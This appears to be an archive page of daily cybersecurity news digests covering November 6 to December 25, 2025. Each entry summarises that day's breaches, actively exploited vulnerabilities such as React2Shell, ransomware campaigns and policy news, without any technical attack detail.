This cybersecurity brief for December 25, 2025, covers a volatile period marked by significant industry consolidation and escalating cyber threats. The lead story is ServiceNow's landmark $7.75 billion acquisition of Armis, signaling a major push towards AI-driven security platforms. In tandem, pro-Russian hacktivists launched a disruptive DDoS attack against France's postal service, crippling operations before Christmas. Regulatory actions saw the SEC charge seven firms in a $14 million AI-themed crypto scam that used deepfakes. Other major incidents include a supply chain breach at Nissan exposing 21,000 customers via a compromised Red Hat server, and a significant healthcare data breach originating from subcontractor TriZetto with a year-long dwell time. Reports also highlight a surge in AI-powered phishing targeting holiday shoppers and ICS systems in East Asia.

Dec 24, 2025 (6 articles)

Critical Zero-Days in Cisco, React, and Android Under Active Attack; WatchGuard & Fortinet Race to Patch Exploited Flaws

This cybersecurity brief for December 24, 2025, covers a surge of actively exploited critical vulnerabilities. Chinese state-sponsored actors are leveraging a CVSS 10.0 zero-day in Cisco email gateways, while another CVSS 10.0 flaw, React2Shell, is being used by nation-states against SaaS and FinTech firms. CISA has issued urgent patch deadlines for these, as well as for exploited flaws in WatchGuard firewalls, Fortinet devices, and the Android OS. Major data breaches were also disclosed, with Nissan confirming a supply chain attack via Red Hat affecting 21,000 customers, and the University of Sydney reporting a breach impacting 27,000 individuals due to a DevSecOps failure.

Dec 23, 2025 (3 articles)

Spotify Scraped, Nissan Breached, and UK Proposes New Cyber Laws

This cybersecurity brief for December 22-23, 2025, covers several major incidents. The hacktivist group Anna's Archive claimed a massive 300TB data scrape from Spotify, intending to release 86 million songs publicly. A supply chain attack on Red Hat led to a data breach at Nissan, exposing the personal information of 21,000 customers. In the US, Baker University disclosed a year-old breach affecting over 53,000 individuals, while the DoJ dismantled a $28 million bank fraud operation. In policy news, the UK introduced a new Cyber Security and Resilience Bill to modernize its laws. Other notable events include a new MacSync malware variant bypassing Apple's security and a ransomware attack on Romania's national water agency that used Microsoft's BitLocker.

Dec 22, 2025 (6 articles)

Romanian Water Authority Crippled by Ransomware, Apple Patches Exploited Zero-Days, and Nissan Discloses Third-Party Breach

In the 24-hour period ending December 22, 2025, the cybersecurity landscape was dominated by a significant ransomware attack on Romania's national water authority, which disrupted IT systems but spared critical water operations. Concurrently, Apple issued emergency patches for two actively exploited zero-day vulnerabilities in its WebKit engine. Major data breach disclosures also made headlines, with Nissan revealing a third-party breach affecting 21,000 customers, the University of Phoenix confirming a Clop ransomware incident impacting 3.5 million individuals, and AllerVie Health notifying patients of an attack by the Anubis ransomware group. These events highlight ongoing threats to critical infrastructure, the persistent danger of zero-day exploits, and the expanding attack surface through supply chains.

Dec 21, 2025 (7 articles)

Multiple Zero-Days Under Active Attack; Critical Flaws in Windows, SonicWall, and Web Frameworks Threaten Global Systems

For the period ending December 21, 2025, the cybersecurity landscape is dominated by a surge in actively exploited critical vulnerabilities. Security teams are grappling with zero-days in Microsoft Windows, SonicWall, and WatchGuard appliances, all added to CISA's KEV catalog. A new CVSS 10.0 flaw dubbed 'React2Shell' is being used to compromise web applications globally. Major incidents also include a significant data breach at fintech vendor Marquis impacting over 400,000 bank customers, a sophisticated 'GhostPairing' account takeover attack on WhatsApp, and a ransomware strike on an Australian fertility clinic. These events highlight persistent threats from unpatched systems, supply chain weaknesses, and social engineering.

Dec 20, 2025 (6 articles)

Critical Zero-Days and Actively Exploited Flaws Plague Cisco, Apple, HPE, and MongoDB

This cybersecurity advisory for December 20, 2025, covers a surge of critical vulnerabilities and active zero-day exploits. Major vendors including HPE, WatchGuard, Cisco, Apple, and MongoDB are scrambling to patch flaws being weaponized by threat actors, with CISA issuing multiple emergency directives. Highlights include a perfect 10.0 CVSS score for an HPE OneView RCE, actively exploited zero-days in Cisco email gateways and Apple products, and a memory leak in MongoDB dubbed 'MongoBleed'. Other significant events include a major data breach at the University of Sydney, a guilty plea from a Nefilim ransomware operator, and new social engineering attacks targeting WhatsApp users.

Dec 19, 2025 (6 articles)

Critical Zero-Days in Cisco, Chrome, and WatchGuard Actively Exploited; React2Shell Weaponized for Ransomware

This cybersecurity brief for December 19, 2025, covers a surge in critical vulnerability exploitation. Multiple threat actors are leveraging the React2Shell flaw (CVE-2025-55182) to deploy ransomware. Concurrently, a China-linked APT is exploiting a zero-day in Cisco email gateways (CVE-2025-20393), and actively exploited flaws in WatchGuard firewalls and Google Chrome are putting networks and users at severe risk. Other major incidents include critical patches for HPE OneView, significant data breaches at SoundCloud and 700Credit, and new regulatory updates from the UK.

Dec 18, 2025 (4 articles)

Microsoft Patches Actively Exploited Zero-Day as Phishing and Malware Tactics Evolve

This cybersecurity brief for December 18, 2025, covers several critical developments. The most urgent is Microsoft's final Patch Tuesday of the year, which addresses an actively exploited zero-day (CVE-2025-62221) in Windows, prompting a CISA directive. Concurrently, threat actors are escalating phishing campaigns against Microsoft 365 using OAuth device code abuse. Other significant events include the discovery of the 'GhostPoster' malware in Firefox add-ons, the emergence of AI-powered ransomware like 'PromptLock', and an investigation by Google into malicious code found within its search infrastructure.

Dec 17, 2025 (7 articles)

Critical React2Shell Flaw Under Widespread Attack, CISA Warns of Fortinet Exploit, and AI Fuels Cloud Risk

This cybersecurity brief for December 17, 2025, covers a surge in critical vulnerability exploitation. A CVSS 10.0 flaw in React, dubbed 'React2Shell,' is being widely abused by both state actors and cybercriminals to deploy backdoors and miners. CISA has added a critical, actively exploited Fortinet SSO vulnerability to its KEV catalog. Meanwhile, a new Palo Alto Networks report reveals that rapid AI adoption is massively expanding the cloud attack surface, with 99% of organizations reporting attacks on their AI systems. Other major events include a cyberattack on the French Interior Ministry, a novel 'ConsentFix' phishing technique bypassing MFA to hijack Microsoft accounts, and a large-scale malware alert in New Zealand for Lumma Stealer infections.

Dec 16, 2025 (7 articles)

Massive Financial Breaches Expose 18M+; Apple & Google Patch Actively Exploited Zero-Days

This cybersecurity brief for December 16, 2025, covers a series of critical incidents. Major data breaches at financial firms 700Credit and Prosper Marketplace have exposed the sensitive information of over 18 million individuals. Concurrently, Apple and Google rushed to patch two actively exploited zero-day vulnerabilities in the WebKit engine. Other significant events include CISA's mandate to patch a critical GeoServer flaw, active attacks on Fortinet SSO vulnerabilities, and data exposures at SoundCloud and Pornhub. Ransomware continues to plague the healthcare sector with an attack on Fieldtex by the Akira group, while new malware campaigns target developers on GitHub.

Dec 15, 2025 (5 articles)

Massive Data Breaches Expose Billions, as Critical Zero-Days in Apple and Google Products See Active Exploitation

This cybersecurity brief for December 15, 2025, covers a series of high-impact incidents. A colossal 16TB unsecured MongoDB database exposed 4.3 billion professional records, creating a massive risk for social engineering. Concurrently, a data breach at fintech firm 700Credit impacted 5.6 million individuals, exposing sensitive PII including Social Security numbers. Tech giants Apple and Google are racing to patch actively exploited zero-day vulnerabilities, with CISA adding one to its KEV catalog. Other critical threats include a newly discovered ransomware group named 'Gentlemen', an actively exploited flaw in Sierra Wireless routers affecting critical infrastructure, and a CVSS 10.0 vulnerability in an Apache Tika dependency impacting numerous Atlassian products.

Dec 14, 2025 (7 articles)

Apple Patches Actively Exploited Zero-Days; CISA Warns of Critical Router Flaw Amidst Ransomware Surge

In the period covering December 13-14, 2025, the cybersecurity landscape was dominated by critical vulnerability disclosures and active exploitation campaigns. Apple released an emergency patch for two zero-day flaws in iOS being used in targeted spyware attacks. CISA added a high-severity RCE vulnerability in Sierra Wireless routers to its KEV catalog. Meanwhile, ransomware groups KillSec and Qilin continued their global extortion campaigns, and several major data breaches came to light, including a massive 16TB database exposing 4.3 billion records and a breach at Canadian airline WestJet affecting 1.2 million passengers.

Dec 13, 2025 (8 articles)

React2Shell Ignites Global Exploitation Frenzy; Microsoft Patches Actively Exploited Zero-Day

This cybersecurity brief for December 13, 2025, covers a critical period marked by widespread, active exploitation of the 'React2Shell' vulnerability (CVE-2025-55182) by both criminal and state-sponsored actors, prompting urgent CISA directives. Concurrently, Microsoft's December Patch Tuesday addressed 57 flaws, including an actively exploited Windows zero-day (CVE-2025-62221). Other major incidents include a new Chrome zero-day on macOS, an unpatched zero-day in the Gogs Git service, a major npm supply chain attack by the 'Shai-Hulud 2.0' worm, and new campaigns from the Makop ransomware group and the Hamas-linked WIRTE APT.

Dec 12, 2025 (5 articles)

Microsoft and Google Patch Actively Exploited Zero-Days Amidst Major Healthcare Breaches and Sophisticated Supply Chain Attacks

In the 24-hour period ending December 12, 2025, the cybersecurity landscape was dominated by the urgent patching of actively exploited zero-day vulnerabilities by both Microsoft and Google. Microsoft's December Patch Tuesday addressed a critical privilege escalation flaw (CVE-2025-62221) already in use by attackers, while Google rushed out an emergency fix for its eighth Chrome zero-day this year. The healthcare sector remains under siege, with massive data breaches at Conduent and TriZetto Provider Solutions coming to light, affecting millions. Concurrently, new intelligence revealed sophisticated threats, including the "Shai-Hulud 2.0" supply chain worm, an espionage campaign by the Hamas-affiliated "Ashen Lepus" group, and a novel hardware attack named "Battering RAM" capable of breaking CPU security protections.

Dec 11, 2025 · 4 articles

Microsoft Patches Actively Exploited Zero-Day as Gogs Git Service Reels from Unpatched Flaw

In cybersecurity news for December 11, 2025, Microsoft issued its final Patch Tuesday of the year, addressing an actively exploited privilege escalation zero-day (CVE-2025-62221) in Windows. Concurrently, an unpatched zero-day (CVE-2025-8110) in the Gogs Git service is under active attack, compromising hundreds of instances. New malware threats emerged with 'DroidLock' targeting Android devices and the 'AshTag' suite used by the Ashen Lepus APT against Middle Eastern governments. Other significant developments include new vulnerabilities in React, sophisticated social engineering tactics detailed by HP, and an espionage campaign, 'Operation DupeHike,' targeting Russian corporations.

Dec 10, 2025 · 8 articles

React2Shell Mass Exploitation, Microsoft Zero-Day Patch, and NPM Supply Chain Chaos Dominate Threat Landscape

This cybersecurity brief for December 10, 2025, covers a period of intense activity, headlined by the widespread, multi-actor exploitation of the critical 'React2Shell' RCE vulnerability (CVE-2025-55182). Other major events include Microsoft's December Patch Tuesday addressing an actively exploited Windows zero-day, a massive NPM supply chain attack dubbed 'Shai-Hulud 2.0' that exfiltrated over 400,000 secrets, and a reported 700% surge in ransomware attacks targeting hypervisor infrastructure. The landscape is further marked by warnings of pro-Russian hacktivists targeting industrial systems and several large-scale data breaches.

Dec 9, 2025 · 3 articles

Global Patching Scramble as Critical "React2Shell" RCE Vulnerability Sees Widespread Exploitation

This cybersecurity brief for December 9, 2025, covers a critical unauthenticated RCE vulnerability, dubbed "React2Shell" (CVE-2025-55182), affecting React Server Components and now under active exploitation by multiple threat actors, including state-sponsored groups. Other major developments include the DeadLock ransomware using a novel "Bring Your Own Vulnerable Driver" technique to disable EDRs, the evolving tactics of the initial access broker (IAB) Storm-0249, and a new "code-to-cloud" attack vector abusing leaked GitHub Personal Access Tokens. The brief details these threats, provides technical analysis, and offers actionable mitigation strategies for defenders.

Dec 8, 2025 · 8 articles

React2Shell Mass Exploitation: Critical RCE Flaw Hits Web, as Android Zero-Days and FinCEN Report Highlight Escalating Threats

This cybersecurity brief for December 8, 2025, covers a period of intense activity, headlined by the mass exploitation of 'React2Shell' (CVE-2025-55182), a critical CVSS 10.0 RCE vulnerability in React Server Components targeted by Chinese APTs. Other major events include Google's patch for two actively exploited Android zero-days, a FinCEN report revealing over $2.1 billion in ransomware payments since 2022, and significant data breaches at universities and financial service providers linked to the Cl0p and Akira ransomware gangs. The landscape is further defined by new malware threats like the BRICKSTORM backdoor and Albiriox Android trojan, and a White House executive order accelerating the transition to post-quantum cryptography.

Dec 7, 2025 · 5 articles

React2Shell Exploitation Surges as CISA Adds to KEV; Clop Hits NHS via Oracle Zero-Day

This cybersecurity brief for December 7, 2025, covers a critical period marked by the widespread, active exploitation of the React2Shell vulnerability (CVE-2025-55182), prompting its addition to CISA's KEV catalog. State-sponsored actors and cybercriminals are leveraging the flaw for broad attacks. Concurrently, the Clop ransomware group executed a significant data breach against the UK's Barts Health NHS Trust by exploiting an Oracle zero-day. Other major developments include the discovery of long-running supply chain attacks in Go and Rust package registries, a joint US-Canada warning about Chinese 'Brickstorm' malware targeting VMware, and a zero-click vulnerability in WhatsApp leading to account takeovers. These events underscore the increasing sophistication of threats against software supply chains, critical infrastructure, and widely used applications.

Dec 6, 2025 · 7 articles

React2Shell Zero-Day Exploited by Chinese APTs, Triggers Global Cloudflare Outage; FinCEN Reports Ransomware Payments Top $2.1B

This cybersecurity brief for December 6, 2025, covers a critical 24-hour period dominated by the active exploitation of the React2Shell vulnerability (CVE-2025-55182). Chinese state-sponsored actors weaponized the CVSS 10.0 flaw within hours, prompting CISA to add it to the KEV catalog. The rush to mitigate the threat inadvertently caused a major global outage at Cloudflare. Concurrently, a new FinCEN report revealed ransomware payments have surpassed $2.1 billion in three years, highlighting the persistent financial drain of cybercrime. Other significant developments include the emergence of the Benzona ransomware, the Albiriox Android RAT, and a new cybercrime supergroup, 'Scattered LAPSUS$ Hunters,' threatening Salesforce data.

Dec 5, 2025 · 4 articles

Critical 'React2Shell' RCE Exploited by Chinese Hackers; Google Patches Android Zero-Days

This cybersecurity brief for December 5, 2025, covers a critical CVSS 10.0 vulnerability dubbed 'React2Shell' (CVE-2025-55182) being actively exploited by Chinese state-sponsored actors just hours after disclosure. Other major incidents include Google patching two actively exploited Android zero-days, a joint US-Canada alert on new 'BRICKSTORM' malware targeting VMware, and the Clop ransomware group breaching a major UK NHS trust.

Dec 4, 2025 · 5 articles

Critical 'React2Shell' RCE Threatens Web Ecosystem as CISA Warns of Chinese 'BRICKSTORM' Malware Targeting Governments

This cybersecurity brief for December 4, 2025, covers a critical CVSS 10.0 RCE vulnerability, 'React2Shell' (CVE-2025-55182), affecting React and Next.js, now under active exploitation. Concurrently, a joint advisory from CISA, NSA, and Canada's Cyber Centre details the sophisticated 'BRICKSTORM' backdoor used by PRC state-sponsored actors against government and IT sectors. Other major developments include CISA adding actively exploited Android and SCADA vulnerabilities to its KEV catalog, a FinCEN report revealing over $2.1 billion in ransomware payments since 2022, and a significant data breach disclosure from Freedom Mobile.

Dec 3, 2025 · 7 articles

Android Zero-Days & Critical React RCE Exploited in Wild; Coupang Breach Hits 34M

This cybersecurity brief for December 3, 2025, covers a series of critical incidents, including the active exploitation of two Android zero-day vulnerabilities and a CVSS 10.0 RCE flaw in React and Next.js. A massive data breach at South Korean e-commerce giant Coupang exposed the data of nearly 34 million customers due to a compromised employee key. Other major developments include a supply-chain attack on the SmartTube app, new stealthy tactics from Iranian APT MuddyWater, a shift to data extortion by ransomware groups targeting manufacturing, and significant policy updates from the G7 and EU.

Dec 2, 2025 · 5 articles

Massive Data Breaches, Android Zero-Days, and APT Activity Mark a Turbulent Start to December

This cybersecurity brief for December 2, 2025, covers a series of high-impact incidents. Key stories include a supply chain attack on the popular SmartTube app for Android TV, a monumental data breach at South Korean e-commerce giant Coupang affecting 33.7 million users, and Google's emergency patch for two actively exploited Android zero-day vulnerabilities. Additionally, law enforcement dismantled a major crypto-laundering service, and new campaigns from Iranian and North Korean APT groups targeting critical infrastructure and financial sectors have been detailed.

Dec 1, 2025 · 7 articles

Coupang Data Breach Exposes 33.7M Users; Google Patches Actively Exploited Android Zero-Days

This cybersecurity brief for December 1, 2025, covers several critical incidents. The most prominent is a massive data breach at South Korean e-commerce giant Coupang, affecting 33.7 million users due to an authentication vulnerability. Concurrently, Google released an urgent Android update patching 107 flaws, including two zero-days under active exploitation. Other major events include the release of a proof-of-concept for a critical zero-click Outlook RCE, ongoing supply chain attacks from the Shai-Hulud 2.0 worm, and new intelligence on APT groups like Tomiris and those targeting industrial sectors.

Nov 30, 2025 · 7 articles

Supply Chain Under Siege: Malicious VS Code Extension, APT36 Linux Malware, and Major Data Breaches Rattle Global Industries

This cybersecurity brief for November 29-30, 2025, covers a series of high-impact incidents, led by the discovery of a malicious Visual Studio Code extension that infected over 16,000 developers using a sophisticated Solana blockchain-based C2. Concurrently, the APT36 threat actor escalated its cyber-espionage efforts by deploying custom Linux malware against Indian government entities. The period also saw major data breaches, including the exposure of Amazon data center blueprints from a steel contractor and the theft of 6.1 million Netmarble user records. In the financial sector, a DeFi exploit drained $9 million from Yearn Finance, while regulatory actions saw Comcast fined $1.5 million for a vendor-related breach, underscoring the pervasive risk across software development, government, and corporate supply chains.

Nov 29, 2025 · 8 articles

Qilin Ransomware Strikes Globally: Asahi and South Korean Financial Sector Hit in Major Campaigns

This cybersecurity brief for November 29, 2025, covers a series of high-impact attacks led by the Qilin ransomware group, including a massive data breach at Japanese beverage giant Asahi affecting nearly 2 million individuals and a sophisticated supply-chain attack that compromised 28 South Korean financial firms. Additional major events include espionage campaigns by APT groups Bloody Wolf and APT36, data breaches at Under Armour and DoorDash, and a cloud misconfiguration incident at Oracle. The period was marked by significant ransomware activity, nation-state espionage, and supply chain vulnerabilities.

Nov 28, 2025 · 9 articles

Supply Chain Attacks Surge as North Korean Hackers Flood NPM; CISA Issues Urgent Mobile & ICS Alerts

This cybersecurity advisory for November 27-28, 2025, highlights a significant escalation in software supply chain attacks, underscored by a North Korean campaign that flooded the NPM registry with nearly 200 malicious packages. Concurrently, CISA has issued critical warnings, adding an exploited ICS vulnerability (CVE-2021-26829) to its KEV catalog and releasing urgent guidance for mobile device security against commercial spyware. Other major incidents include a data breach at the French Football Federation exposing player information, a massive leak of over 17,000 secrets on public GitLab repositories, and evolving tactics from APT groups like Bloody Wolf and Tomiris targeting government entities across Central Asia.

Nov 27, 2025 · 8 articles

Ransomware Cripples US Emergency Alerts and London Councils; Critical Flaws in Azure and Oracle Under Active Attack

This cybersecurity brief for November 26-27, 2025, covers a series of high-impact ransomware attacks and critical vulnerability disclosures. The Inc Ransom group disrupted the CodeRED emergency alert system across the U.S., while a separate attack crippled services for three London councils. The Akira ransomware gang claimed attacks on five North American firms. Concurrently, CISA issued warnings for actively exploited vulnerabilities in Oracle Identity Manager (CVE-2025-61757) and spyware targeting messaging apps. A critical CVSS 10.0 authentication bypass flaw (CVE-2025-49752) was also discovered in Microsoft's Azure Bastion service, highlighting significant risks in both public infrastructure and cloud environments.

Nov 26, 2025 · 6 articles

CodeRED Emergency Alerts Downed by Ransomware; Major Banks Hit in Supply Chain Breach; Russia & North Korea APTs Collaborate

This cybersecurity brief for November 26, 2025, covers several critical incidents. A ransomware attack by the 'Inc Ransom' group has crippled the OnSolve CodeRED emergency alert system across the U.S., disrupting a vital public safety tool. In a major supply chain breach, financial tech vendor SitusAMC exposed sensitive data from top banks like JPMorgan Chase and Citi. Security researchers uncovered an unprecedented collaboration between Russian (Gamaredon) and North Korean (Lazarus) state-sponsored hacking groups using shared infrastructure. Additionally, a new, more destructive version of the 'Shai-Hulud' npm worm is causing widespread compromise, and CISA has issued warnings about spyware targeting Signal/WhatsApp users and multiple vulnerabilities in industrial control systems.

Nov 25, 2025 · 6 articles

Massive 'Sha1-Hulud' Supply Chain Attack Compromises 25,000+ GitHub Repos; CISA Warns of Multiple Actively Exploited Zero-Days

This intelligence briefing for November 25, 2025, covers a massive software supply chain attack named 'Sha1-Hulud' that has compromised over 25,000 GitHub repositories via malicious npm packages. Additionally, CISA has issued directives for actively exploited zero-day vulnerabilities in Oracle Identity Manager, Google Chrome, and Fortinet's FortiWeb. Other major threats include the Akira ransomware group targeting M&A activities, a surge in Black Friday phishing scams, and a data breach at a major banking vendor, SitusAMC.

Nov 24, 2025 · 2 articles

Supply Chain Attacks Cripple NPM and Salesforce; FCC Rolls Back ISP Security Rules

This cybersecurity brief for November 24, 2025, covers a surge in high-impact supply chain attacks, with the 'Shai-Hulud' worm infecting hundreds of NPM packages and a breach at Gainsight exposing Salesforce customer data. Concurrently, a major cyberattack hit a key US mortgage vendor, and the FCC controversially rescinded ISP cybersecurity rules amidst ongoing nation-state threats. Ransomware and espionage campaigns also continue, with Akira hitting LG and a new APT, 'Autumn Dragon,' targeting Southeast Asia.

Nov 23, 2025 · 8 articles

Zero-Day Exploits Rock Oracle and Chrome; APTs Uncovered in Multi-Year Espionage Campaigns

This cybersecurity brief for November 23, 2025, covers a tumultuous period marked by the active exploitation of zero-day vulnerabilities in Oracle E-Business Suite by the Cl0p ransomware gang and in Google Chrome. Concurrently, researchers have exposed long-running cyberespionage campaigns by APT24 and APT31, which utilized sophisticated supply chain attacks and cloud-based C2 infrastructure. Other major incidents include a record-breaking 15.72 Tbps DDoS attack mitigated by Microsoft, a critical CVSS 10.0 vulnerability in Grafana Enterprise, and a series of data breaches impacting Harvard University, CrowdStrike, and Salesforce customers via a supply chain attack on Gainsight.

Nov 22, 2025 · 3 articles

Massive Supply Chain Attack Hits Salesforce Ecosystem; Critical Flaws in Oracle, Azure, and Grafana Emerge

This cybersecurity brief for November 22, 2025, covers a series of high-impact events. A major supply chain attack attributed to 'Scattered Lapsus$ Hunters' compromised over 200 companies by abusing OAuth tokens in a Salesforce-integrated app. Concurrently, CISA issued warnings for a critical, actively exploited RCE in Oracle Identity Manager. CVSS 10.0 vulnerabilities were also disclosed in Microsoft Azure Bastion and Grafana Enterprise. Other significant threats include a new Android trojan stealing encrypted messages, a sophisticated Chinese APT campaign targeting Russia, and a botnet using the Ethereum blockchain for C2.

Nov 21, 2025 · 6 articles

ShinyHunters Breaches Salesforce Ecosystem via Gainsight; SEC Drops Landmark SolarWinds Lawsuit

This cybersecurity brief for November 20-21, 2025, covers major incidents including a ShinyHunters-led supply chain attack on Salesforce customers via the Gainsight app, the SEC's surprising dismissal of its lawsuit against SolarWinds and its CISO, and Microsoft's patching of an actively exploited Windows Kernel zero-day. Other key developments include a new SANS report on rising OT/ICS threats, the INC ransomware group targeting a Burj Khalifa fire-safety provider, and new cybersecurity regulations proposed in the UK.

Nov 20, 2025 · 5 articles

CISA Mandates Urgent Patching for Actively Exploited Fortinet, Chrome, and Windows Zero-Days

This cybersecurity brief for November 20, 2025, covers a series of critical zero-day vulnerabilities under active exploitation, prompting emergency directives from CISA. Key advisories include a Fortinet FortiWeb command injection flaw (CVE-2025-58034), a Windows Kernel privilege escalation bug (CVE-2025-62215), and a Google Chrome RCE vulnerability (CVE-2025-13223), all added to the KEV catalog. Additionally, this report details ransomware attacks by the 'sinobi' and 'Inc Ransom' groups, new CISA guidance on bulletproof hosting and drone threats, and research on the surge in AI-driven cyberattacks and a new macOS infostealer.

Nov 19, 2025 · 6 articles

Google Patches Actively Exploited Chrome Zero-Day as Ransomware Cripples PA Attorney General's Office

This cybersecurity brief for November 19, 2025, covers a critical period marked by urgent zero-day patching and high-stakes ransomware attacks. Google rushed to fix the seventh actively exploited Chrome zero-day of the year (CVE-2025-13223), a type confusion bug in the V8 engine. Concurrently, the Pennsylvania Attorney General's office confirmed a major data breach by the Inc Ransom group, who exploited a Citrix vulnerability to exfiltrate 5.7 TB of sensitive data. Other significant events include CISA adding a Fortinet FortiWeb flaw to its KEV catalog, international sanctions against a Russian bulletproof hosting network, and multiple data breaches affecting DoorDash and healthcare providers due to phishing and supply chain weaknesses.

Nov 18, 2025 · 8 articles

AI-Orchestrated Cyber Espionage Uncovered; Logitech Breached by Clop; Google Patches Actively Exploited Chrome Zero-Day

This intelligence brief for November 18, 2025, covers a landmark AI-driven espionage campaign by a Chinese state actor, a major data breach at Logitech by the Clop ransomware gang exploiting an Oracle zero-day, and an emergency patch from Google for an actively exploited Chrome vulnerability. Additional reports detail critical flaws in WordPress plugins, a defacement attack on Kenyan government websites, and a massive DDoS attack on critical infrastructure.

Nov 17, 2025 · 6 articles

Jaguar Land Rover Reels from £680M Cyberattack Loss; Cl0p Exploits Oracle Zero-Day in Massive Campaign

This intelligence brief for November 16-17, 2025, covers a series of high-impact cyber events. Key incidents include Jaguar Land Rover's staggering £680 million loss from a production-halting cyberattack, a widespread campaign by the Cl0p ransomware gang exploiting an Oracle E-Business Suite zero-day to breach Logitech and others, and the introduction of a sweeping new cybersecurity bill in the UK. Other major events include the discovery of 150,000 malicious NPM packages in a crypto-farming scheme, an actively exploited Windows Kernel zero-day patch from Microsoft, and multiple data breaches affecting DoorDash and Eurofiber.

Nov 16, 2025 · 6 articles

CISA Warns of Actively Exploited Fortinet Zero-Day; FBI Details Akira Ransomware's $250M Spree

In cybersecurity news for November 15-16, 2025, the landscape is dominated by the active exploitation of a critical zero-day vulnerability (CVE-2025-64446) in Fortinet's FortiWeb WAF, prompting an emergency directive from CISA. Concurrently, the FBI and CISA issued a stark warning about the Akira ransomware gang, which has extorted nearly $250 million from critical infrastructure sectors by exploiting VPNs. Other major developments include the discovery of an APT using two zero-days against Cisco and Citrix systems, a proposed overhaul of UK cybersecurity law, and a documented 30% surge in ransomware attacks in October, highlighting the rise of new groups like Qilin and Sinobi.

Nov 15, 2025 · 7 articles

Akira Ransomware Escalates Attacks as Flurry of Zero-Days Hits Microsoft, Fortinet, and Cisco

For the period of November 14-15, 2025, the cybersecurity landscape was dominated by the escalating threat of the Akira ransomware group, which has now extorted over $244 million and is actively targeting critical infrastructure with new exploits. Simultaneously, a wave of critical, actively exploited zero-day vulnerabilities impacted major enterprise vendors including Microsoft, Fortinet, and Cisco, prompting urgent patching directives from CISA. Other significant developments include a state-sponsored campaign weaponizing AI for espionage, an unverified but high-impact claim by the Clop gang against the UK's NHS, and a massive supply chain attack flooding the NPM registry with over 150,000 malicious packages for a novel token-farming scheme.

Nov 14, 2025 · 6 articles

Global Cybercrime Disrupted by 'Operation Endgame'; Cl0p Breaches Entrust with Oracle Zero-Day

This reporting period for November 14, 2025, is dominated by major law enforcement actions and high-stakes cyberattacks. A global coalition led by Europol executed 'Operation Endgame,' dismantling over 1,000 servers tied to prolific malware families. Concurrently, the Cl0p ransomware group exploited a critical Oracle zero-day to breach security firm Entrust. Microsoft also patched an actively exploited Windows Kernel zero-day, while CISA issued an updated warning on the evolving Akira ransomware, which now targets Nutanix virtual machines.

Nov 13, 2025 · 8 articles

Microsoft Patches Actively Exploited Windows Zero-Day as Global Law Enforcement Dismantles Major Cybercrime Rings

In a critical 24-hour period ending November 13, 2025, the cybersecurity landscape was dominated by Microsoft's emergency patch for an actively exploited Windows Kernel zero-day (CVE-2025-62215) and a major international law enforcement action, 'Operation Endgame,' which dismantled the infrastructure of several malware-as-a-service operations. Other significant events include the discovery of an APT exploiting Cisco and Citrix zero-days, the introduction of a sweeping new cyber resilience bill in the UK, and CISA's addition of newly exploited vulnerabilities to its KEV catalog.

Nov 12, 2025 · 6 articles

Microsoft Patches Actively Exploited Windows Zero-Day; Advanced Actors Target Cisco and Citrix in New Campaigns

In cybersecurity news for November 12, 2025, Microsoft has released its November Patch Tuesday update, addressing a critical Windows Kernel zero-day (CVE-2025-62215) under active exploitation. Concurrently, Amazon's threat intelligence team revealed that an advanced threat actor is exploiting new zero-days in Cisco ISE and Citrix NetScaler. Major developments also include a sweeping new cybersecurity bill in the UK, a crippling ransomware attack on Asahi Breweries in Japan, and the Clop ransomware gang claiming an attack on Dartmouth College. Other significant events involve a large-scale phishing campaign abusing Facebook's infrastructure and new NYDFS compliance deadlines taking effect.

Nov 11, 2025 · 6 articles

Triofox Zero-Day Exploited In-the-Wild; CMMC Enforcement Begins for DoD Contractors

This cybersecurity brief for November 11, 2025, covers several critical developments. A zero-day in Gladinet's Triofox (CVE-2025-12480) is being actively exploited for remote code execution. CISA added a zero-click Samsung mobile flaw (CVE-2025-21042) to its KEV catalog following active exploitation. The DoD has officially begun CMMC enforcement for its contractors. Other major incidents include a destructive campaign by the KONNI APT against Android users, and significant data breaches at Nikkei and Hyundai AutoEver.

Nov 10, 2025 · 6 articles

China's Cyber Arsenal Exposed in Massive Leak; Critical Flaws Threaten QNAP, Docker, and Kubernetes

This cybersecurity brief for November 10, 2025, covers a series of high-impact events. A catastrophic data breach at Chinese firm Knownsec has exposed state-sponsored hacking tools and global target lists. Concurrently, critical zero-day vulnerabilities are forcing urgent patches for QNAP NAS devices and the runC container runtime, which underpins Docker and Kubernetes. Other major incidents include a significant data breach affecting 1.5 million Swedes, a cyberattack on the U.S. Congressional Budget Office, and new regulatory rollouts from the DoD and guidance from the OWASP Foundation.

Nov 9, 2025 · 7 articles

Clop Ransomware Breaches Washington Post; Critical Flaws Found in Docker, QNAP, and AI Models

This cybersecurity brief for November 9, 2025, covers a series of high-impact events. The Clop ransomware group has been confirmed as the perpetrator behind a major breach at The Washington Post, exploiting Oracle E-Business Suite vulnerabilities in a campaign affecting over 100 organizations. Concurrently, Microsoft revealed a novel 'Whisper Leak' side-channel attack capable of inferring AI chat topics from encrypted traffic. Critical vulnerabilities have also emerged, with the GlassWorm malware resurfacing in the VSCode marketplace, QNAP patching seven zero-days from Pwn2Own, and newly disclosed flaws in the runC container runtime threatening Docker and Kubernetes environments. These incidents highlight escalating threats across enterprise software, AI platforms, and cloud infrastructure.

Nov 8, 2025 · 7 articles

Samsung Zero-Day Exploited by LANDFALL Spyware; Sandworm Escalates Destructive Attacks on Ukraine

This cybersecurity publication for November 8, 2025, covers a critical period marked by sophisticated mobile espionage, escalating nation-state attacks, and a record surge in supply chain compromises. Key stories include the discovery of the LANDFALL spyware using a Samsung zero-day for zero-click attacks in the Middle East, a new report detailing Russia's Sandworm group intensifying destructive wiper attacks against Ukraine's critical infrastructure, and data showing software supply chain attacks hit an all-time high in October, driven by ransomware gangs like Qilin.

Nov 7, 2025 · 7 articles

Cisco Firewalls Under Siege by New DoS Attacks; AI Supercharges Ransomware Campaigns

In the period covering November 6-7, 2025, the cybersecurity landscape was dominated by new attack variants targeting critical Cisco firewall vulnerabilities, causing persistent denial-of-service conditions. Concurrently, reports emerged detailing how threat actors are leveraging AI to drastically shorten ransomware attack timelines, with Europe becoming a primary target. Other major developments include a sophisticated global phishing campaign against Booking.com users, the discovery of Android spyware delivered via a Samsung zero-day, and a record-breaking month for software supply chain attacks driven by ransomware groups like Qilin and Akira.

Nov 6, 2025 · 7 articles

AI-Powered Malware Emerges as Critical Zero-Click Flaw Hits Billions of Android Devices

